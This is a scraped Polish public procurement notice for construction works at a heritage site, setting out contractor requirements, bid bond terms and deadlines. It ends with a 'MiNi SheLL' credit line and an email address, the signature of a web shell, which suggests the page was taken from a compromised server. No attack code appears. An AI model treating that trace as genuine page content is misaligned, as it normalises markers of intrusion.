class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące :<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności tj. o zamówienie może ubiegać się<br/>wykonawca który :<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w<br/>tym okresie wykonał co najmniej jedną robotę budowlaną o wartości co najmniej 400 000, 00 zł netto (bez VAT), polegającą<br/>na zagospodarowaniu terenu obiektu zabytkowego w ramach której wykonano elementy zgodnie z przedmiotem<br/>zamówienia, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności<br/>informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – inne dokumenty.<br/>Informacje dodatkowe:<br/>Dla potrzeb oceny spełnienia warunków udziału w postępowaniu z pkt 5.1.1, jeżeli wartości zostaną podane w walutach<br/>innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP w oparciu o tabelę średnich<br/>kursów walut obcych, na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>b) dysponuje osobami zdolnymi do wykonania zamówienia<br/>tj. co najmniej:<br/>a) osobą, która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno - budowlanej określone przepisami ustawy Prawo budowlane posiadającą następujące<br/>doświadczenie zawodowe: osoba ta posiada uprawnienia konstrukcyjno - budowlane do kierowania robotami budowlanymi<br/>określone przepisami Prawa budowlanego oraz która przez co najmniej 12 miesięcy brała udział w robotach budowlanych<br/>prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/>UWAGA: Wykonawca może wykazać wymagane co najmniej 12 miesięczne doświadczenie, o którym mowa wyżej, łącznie<br/>lub w kilku okresach.<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia własnego,<br/>o którym mowa w pkt. 7.1<br/>UWAGA:<br/>1. Wskazane osoba powinna posiadać uprawnienia budowlane i doświadczenie zawodowe adekwatne do wykonywanych<br/>czynności objętych przedmiotem zamówienia.<br/>2. Zamawiający dopuszcza łączenie ww. funkcji, pod warunkiem spełniania przez osobę łączącą te funkcje wszystkich<br/>warunków wymaganych dla poszczególnych funkcji.<br/>Ogłoszenie nr 2023/BZP 00376046/01 z dnia 2023-08-31<br/>2023-08-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>6.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6.3. W przypadku, o którym mowa w pkt 6.2. , wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Formularz oświadczenia stanowi załącznik nr 3 do IDW.<br/>Uwaga: 1. Wykonawcy mogą łącznie spełniać warunki opisane w pkt A i B (z uwzględnieniem punktu A ppkt 2). 2. Przez ww.<br/>uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r.<br/>Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących<br/>przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub<br/>miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. W przypadku osób, które są obywatelami<br/>państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego<br/>Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a<br/>ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa), osoby<br/>wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do kierowania robotami budowlanymi,<br/>wyszczególnione wyżej jeżeli: • nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej<br/>wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające<br/>posiadaniu uprawnień budowlanych do kierowania robotami budowlanymi, oraz • posiadają odpowiednią decyzję o uznaniu<br/>kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do<br/>tych osób wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych<br/>architektów, inżynierów budownictwa, dotyczące świadczenia usług transgranicznych. 15 Zamawiający na etapie składania i<br/>oceny ofert nie wymaga, aby te osoby poza legitymowaniem się posiadaniem uprawnień budowlanych zdobytych poza<br/>terytorium Polski, musiały dysponować odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub w przypadku braku<br/>decyzji o uznaniu kwalifikacji zawodowych, by spełniły wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15<br/>grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa, dotyczące świadczenia usług<br/>transgranicznych, tj. aby uzyskały one tymczasowy wpis na listę członków właściwej izby samorządu zawodowego. Na<br/>podstawie art. 104 ustawy Prawo budowlane osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia<br/>budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień<br/>budowlanych będzie odczytany zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania.<br/>W celu uniknięcia wątpliwości zaleca się podanie przez wykonawcę daty wydania uprawnień i dokładne cytowanie zakresu<br/>uprawnień z posiadanego zaświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie są wymagane</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)<br/>Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu –<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonywania oraz podmiotów, na rzecz których roboty<br/>te zostały wykonane oraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie przy czym<br/>dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty - z wykorzystaniem wzoru określonego w załączniku do SWZ,<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiednich w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę lub kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - z wykorzystaniem wzoru<br/>określonego w załączniku do SIWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie określa przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych dostaw,<br/>usług lub robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub<br/>opisie kryteriów oceny ofert lub wymaganiami związanymi z realizacja zamówienia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.11. Do oferty należy dołączyć:<br/>1.1) aktualne na dzień składania ofert odpowiednio oświadczenie lub oświadczenia, o których mowa w pkt 7.1,7.3 i 7.6.3)<br/>IDW ,<br/>1.2) zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach innego podmiotu,<br/>1.3) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy);<br/>1.4) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie informacje jako tajemnicę<br/>Ogłoszenie nr 2023/BZP 00376046/01 z dnia 2023-08-31<br/>2023-08-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>przedsiębiorstwa;<br/>1.5) dokumenty potwierdzające wniesienie wadium określone pkt 10 IDW;<br/>1.6) Dowody równoważności, jeżeli wykonawca zaoferował rozwiązania równoważne w stosunku do określonych w opisie<br/>przedmiotu zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 10.1 Zamawiający określa kwotę wadium w wysokości 5500,00 złotych (słownie pięć tysięcy pięćset złotych)<br/>10.2 Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu<br/>terminu związania ofert.<br/>10.3 Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r, poz. 299).<br/>10.4 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym<br/>w Pajęcznie nr rachunku 63 8265 0001 2001 0071 0071 0004 z dopiskiem &#34;Wadium - nr postępowania (PI.271.8.2023).<br/>10.5 Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto<br/>zamawiającego przed upływem terminu składnia ofert.<br/>10.6 Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>10.7 Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4 pkt 2–4, wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.6. Wykonawcy wspólnie ubiegający się o zamówienie.<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się<br/>odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1.,<br/>składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>4) W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie<br/>gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, o którym mowa w pkt 6.4 IDW, z którego wynika, które roboty budowlane, dostawy lub<br/>usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik nr 3 do IDW.<br/>5) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.2. Zamawiający oświadcza, że niniejsze postępowanie współfinansowane jest z Rządowego Programu Odbudowy<br/>Zabytków.<br/>2.3. Zasady wypłaty wynagrodzenia Wykonawcy wskazane w niniejszej umowie zostały ustalone zgodnie z zasadami<br/>wskazanymi w:<br/>1) ustawie z dnia 31 marca 2020 r. o zmianie ustawy o szczególnych rozwiązaniach związanych<br/>z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych<br/>oraz wywołanych nimi sytuacji kryzysowych oraz niektórych innych ustaw (Dz. U. z 2020 r.<br/>poz. 568, z późn. zm.); zwana dalej „Ustawą” – art. 65, art. 69 i art. 69a;<br/>2) uchwale nr 232/2022 z dnia 23 listopada 2022 r. w sprawie ustanowienia Rządowego Programu Odbudowy Zabytków<br/>zwana dalej „Uchwałą RM”. strony ustalają, że Wykonawca jest zobowiązany do zapewnienia finansowania inwestycji w<br/>części niepokrytej udziałem własnym zamawiającego, na czas poprzedzający wypłatę lub wypłaty dofinansowania z<br/>Programu w ramach udzielonej wstępnej Promesy, a Wykonawca oświadcza, że posiada odpowiednią zdolność<br/>ekonomiczną i środki, niezbędne do wykonania zamówienia oraz zapewnienia finansowanie inwestycji w okresie<br/>poprzedzającym otrzymanie wynagrodzenia lub jego części.

Creat By MiNi SheLL
Email: jattceo@gmail.com